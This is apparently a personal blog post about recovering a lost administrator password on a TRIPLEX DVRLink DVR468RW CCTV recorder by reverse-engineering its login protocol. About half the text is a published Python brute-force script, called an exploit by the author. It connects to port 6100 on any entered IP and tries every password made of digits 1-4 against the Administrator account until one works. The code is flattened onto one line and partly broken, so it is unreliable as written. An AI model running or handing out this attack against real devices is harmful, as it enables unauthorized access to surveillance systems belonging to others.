Brute Force Access
At an internship I had a while ago, one project assigned to me was to regain access to a CCTV security system which we had been locked out of for some years. (The previous manager left without leaving the password.)
The DVR system was a TRIPLEX DVRLink DVR468RW, whatever that is. It seemed cheap; a small embedded computer with video in/out, a hard-drive and CD-RW drive for recording storage. The administration interface was accessed either by a web server running on the device or a desktop client you installed on your computer.
My initial thought was to remove the device's internal clock battery to reset the password back to the default of "1234." No dice. Next on the list of things to try was examining the hard-drive in a desktop computer to see if the password could be viewed or reset. The hard drive had a single partition with some old surveillance video footage; nothing to do with settings or authentication. Further examination of the main board revealed a flash memory chip which I assumed stored the device's configuration, including the administration password.
Let me step back here. The administration password could be entered either over one of the remote managemen interfaces (the desktop client or webserver) or physically on the devices keypad. The keypad had the buttons: 1, 2, 3, 4, and ENTER. Well, isn't that interesting; it looks as if the password can only me made up of at most 4 characters. And the desktop client nicely informs me that when entering a password it must be between 4 and 8 characters long, that leaves only 87,296 possibilities.
So, onto the next attack! Knowing that this device had such a limited amount of possible options for the password a brute force attack wouldn't be bad at all. After spending a lot of time examining unsuccessful login attempts from the desktop client in Wireshark and understanding their proprietary protocol, I wrote my first useful python script to automate the process. After a few false positives and tweaks, I was able to get the program to generate a list of every possible password combination for the device and try them out. Within a minute of running I had the device's long lost administration password of 1324 (It has since been changed).
After logging in as the Administrator I was able to see that there were other accounts on the system as well. And my program worked equally well for all of them. However, it is currently hard-coded to use the 'Administrator' username. You may change it if you wish, but why bother?
Below is the exploit for the TRIPLEX DVRLink DVR468RW. I hope that it may be useful to someone (in a law abiding way).
The exploit was tested on a Windows XP machine with Python 3.
#!/usr/bin/env python import socket import binascii import sys import time def passList(): n = 1 li =  while (int(li[-1]) <= 44444444): k = str_base(int(n)) if (k != 0): li.append(k) n = n + 1 return li def asctohex(string_in): a="" for x in string_in: a = a + ("0"+((hex(ord(x)))[2:]))[-2:] return(a) def getIP(): #Ask for IP while True: TCP_IP = input("Enter IP: ") try: socket.inet_aton(TCP_IP) break except socket.error: print("Error, Try Again") return TCP_IP def connect(to, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((to, port)) return s def makePassPacket(password): packet = '41444d494e4953545241544f5200' #14 bytes, username: Admininstrator packet += '0000eb030000920303000000000058d86701' #18 bytes of something... packet += asctohex(password) #4 password packet += '00' size = len(packet) need = 128-size #64 bits in hex junk = '010000eb03000092030300000000003c21f6064c9c6a0700000000000000000000'#bytes of something else packet += junk[0:need] return packet def str_base(num, base=5, numerals = '01234'): if base < 2 or base > len(numerals): raise ValueError("str_base: base must be between 2 and %i" % len(numerals)) result = '' while num: result = numerals[num % (base)] + result num //= base if result.count('0') > 0: return 0 return result TCP_IP = getIP() TCP_PORT = 6100 print('Generating password list..') passwords = passList() print('Running...') msg1=binascii.unhexlify('01010000') msg2=binascii.unhexlify('01010004') msg4=binascii.unhexlify('01200040') for password in passwords: s1 = connect(TCP_IP,TCP_PORT) #socket 1 data 1 s1.send(msg1) s1.settimeout(5) data1 = s1.recv(4) data2 = s1.recv(4) if (binascii.b2a_hex(data1) != b'02000008'): sys.exit("First packet incorect") s2 = connect(TCP_IP,TCP_PORT) #socket 2 data 1 s2.send(msg2) msg3=binascii.unhexlify(binascii.b2a_hex(data2)[0:8]) s2.send(msg3) s2.settimeout(5) data3 = s2.recv(4) data4 = s2.recv(8) if (binascii.b2a_hex(data3) != b'02000004'): sys.exit("Second packet incorect") #socket 1 data 2 passPacket = makePassPacket(str(password)) s1.send(msg4) s1.send(binascii.unhexlify(passPacket)) data5 = s1.recv(8) data6 = s1.recv(8) if (binascii.b2a_hex(data6) != b'02160000' ): print('Password:',password) sys.exit() time.sleep(0.1)